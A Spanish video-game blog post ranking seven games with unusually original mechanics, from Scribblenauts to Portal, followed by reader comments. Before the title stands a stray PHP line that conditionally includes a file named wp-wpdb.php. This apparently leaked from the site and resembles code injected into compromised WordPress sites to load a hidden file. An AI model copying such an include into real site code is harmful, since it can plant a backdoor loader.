if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Los 7 juegos con las mecánicas más originales de los últimos años – La Fortaleza de LeChuck

Los 7 juegos con las mecánicas más originales de los últimos años

En una generación que, a tenor de los últimos rumores, ha puesto ya un pie en la recta final de su larga y exitosa vida, un género ha conseguido alzarse con todos los honores en lo que a ventas se refiere, para alegría de unos y desgracia de muchos otros. El FPS (o shooter en primera persona) ha invadido en mayor o menor medida todos y cada uno de los sistemas de videojuegos, generando una numerosa prole de títulos casi clónicos. La crisis creativa que sufre la industria es en muchos casos alarmante. Sin embargo, en algunas ocasiones, de forma repentina y sin previo aviso, aparecen títulos que van más allá, consiguiendo dar una nueva vuelta de tuerca cuando parecía que estaba ya todo inventado, alejándose de otras mecánicas tradicionalmente exitosas. Son ellos los que añaden la palabra «arte» a esta afición. Los siguientes son siete de los juegos con las mecánicas más originales y novedosas de los últimos años.
juegos-mecanicas-mas-originales

 

7. Scribblenauts

En los videojuegos tradicionales una cosa está clara: el contenido está establecido por los creadores y nuestro trabajo es interactuar con él a medida que se nos va mostrando. Pero, ¿y si el jugador pudiera decidir cómo solucionar cada situación por sí mismo, utilizando su imaginación e incluyendo los elementos que crea necesarios? Esto mismo se planteó 5th Cell, el equipo desarrollador de Scribblenauts. En él, cada puzzle puede ser resuelto de un número casi infinito de maneras posibles. Será el jugador el que, especificando los nombres de los objetos (almacenados en un amplia base de datos) podrá decidir cual es la mejor forma. Originalidad pura.

scribblenauts unlimited

6. Henry Hatsworth en la Aventura Rompecabezas

Una de las novedades más importantes que introdujo Nintendo DS en el mercado fue la inclusión de dos pantallas independientes en la misma máquina. Muchos fueron los juegos que se limitaron a mostrar en esta segunda pantalla mapas, inventarios que no entorpecieran la vista principal. Sin embargo, Electronic Arts consiguieron crear una experiencia única con el juego protagonizado por Henry Hatsworth. Mezclando dos géneros a priori muy distintos como las plataformas y los puzzles, el título logró combinarlos a la perfección y trasladar esta unión a la portátil con una naturalidad asombrosa.
hatsworth

 

5. Rhythm Paradise

Ritmo, ritmo y más ritmo. La segunda pantalla de Nintendo DS, táctil, simplifica al máximo su funcionalidad en Rythm Paradise. Este juego musical huye de la complejidad de otros títulos como Guitar Hero para proporcionar una experiencia divertidísima basada en el ritmo de diversas canciones, cada cual en una situación más surrealista que la anterior. Rythm Paradise resulta accesible, sencillo, desafiante y con una mecánica ejemplar

Rhythm Paradise

4. Braid

Es imposible hablar de originalidad sin contar con los estudios independientes, aquéllos que han logrado aportar frescura a una generación de juegos AAA. Galardonado por doquier, Braid es uno de los más claros ejemplos de que no se necesita un equipo de miles de personas para obtener buenos productos, y que lo más importante en un desarrollo son las ideas. Braid toma prestada un elemento utilizado en no pocas ocasiones en el pasado: el control del tiempo. Sin embargo, el título consigue llevar este concepto a otro nivel. A lo largo de sus fases el juego utiliza el tiempo como elemento conductor, un tiempo que podremos modificar de muy diversas formas, consiguiendo así solucionar cada puzzle.

braid

 

3. Mirror’s Edge

«¿Un plataformas en primera persona? El control debe ser una locura» Esto es lo primero que muchos pensaron al oir hablar de esta joya de Electronic Arts (que efectivamente parece saber hacer más cosas además de los FIFA). Nada más lejos de la realidad. Con un control fluido y accesible, el juego protagonizado por Faith logra que surcar los enormes edificios en los que transcurre la aventura sea una auténtica gozada.

mirrors edge

2. World of Goo

Derroche de ingenio. Ésta sería la definición más apropiada para este juego de 2D Boy. Si de primeras su diseño artístico resulta impactante, la esencia de World of Goo reside en su novedosa mecánica. Utilizando unas físicas perfectamente programadas, el jugador deberá superar diversos obstáculos construyendo estructuras con los Goo’s que protagonizan este juego de puzzles. Frustrante y satisfactorio a partes iguales, supuso uno de los primeros soplos de aire fresco por parte de la escena independiente de esta generación.
 

world of goo

1. Portal

El peldaño más alto de esta lista está ocupado, como no podía ser de otra manera, por una de las mejores sagas de la generación. Lo que en un principio fue incluido casi de casualidad en el paquete «The Orange Box», de Valve, se ha convertido por méritos propios en una de las experiencias más novedosas y gratificantes que se recuerdan no ya en esta generación, sino en toda la historia de los videojuegos. Su mecánica puede ser explicada de manera muy sencilla: con la única ayuda de una pistola generadora de portales (uno de entrada y otro de salida), deberemos ir resolviendo un puzzle tras otro a modo de salas independientes. A partir de ahí, las posibilidades son infinitas. Si la presentación de la primera parte ya nos dejó boquiabiertos, los añadidos de su secuela no hicieron más que confirmar que estábamos ante algo muy especial. 

portal
La sensación de jugar a algo que nunca has visto antes y que consigue sorprendente después de tantos años de juego es indescriptible. Títulos como los que he citado aquí fueron y serán siempre muy bienvenidos. Y vosotros, ¿recordáis algún otro juego que os haya encandilado con su originalidad?
Publicada el
Categorizado como Reportaje

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

12 comentarios

  1. yo por eso estoy deseando que salga a la luz The Witness ,isla con muchas zonas+puzles+1ª persona=win

    de esos 7,he jugado a todos y me he pasado scribblenauts, portal, mirror´s edge y rythm paradise y todos me han encantado,ya que cada uno es completamente diferente al otro.el unico que no me ha llamado ha sido el Braid,pero reconozco que es un buen juego

  2. La verdad es que lo bueno de los blogs es que se pueden descubrir cosas que, por uno mismo, sería más complicado. Yo tengo que jugar a casi todos los juegos de esta lista, aunque me salvo por los Portal y el Mirror's Edge que está work in progress.

  3. Aquí un fanático de las mecánicas únicas! 🙂

    Por desgracia tengo que decir que los juegos que usan mecánicas muy muy únicas normalmente proceden de compañias más pequeñas que han intentado diferenciarse y competir de otra manera más favorable que meterse en un género donde hay peces más gordos.

    Y muchos de los juegos así acaban siendo completamente desconocidos, los de la

  4. Viendo tu lista está claro que las propuestas más originales se hacen en desarrollos "menores" (menos el Mirror's Edge). Cuando hablo de menores me refiero a la inversión que puede suponer desarrollar esos juegos.

    En la próxima generación de consolas de sobremesa, con el megapastizal que va a costar crear sus juegos, me temo que las compañías seguirán con los shooters y

  5. coincido en todos excepto en el rythm, porque ya apareció una versión en gba.
    otro juego que considero original es uno de ds que no llegó a europa el knigts in the nightmare

  6. shadow of the collosus fue muy original, aunque no es de esta gen la experiencia que tuve fue unica y ningun otro juego se le ha acercado( en su propia jugabilidad claro esta). tengo 4 de los 7 juegos que citaste aunque todavia no consigo los de ds todos los conosco ya que eso es lo que busco originalida 😉

Dejar un comentario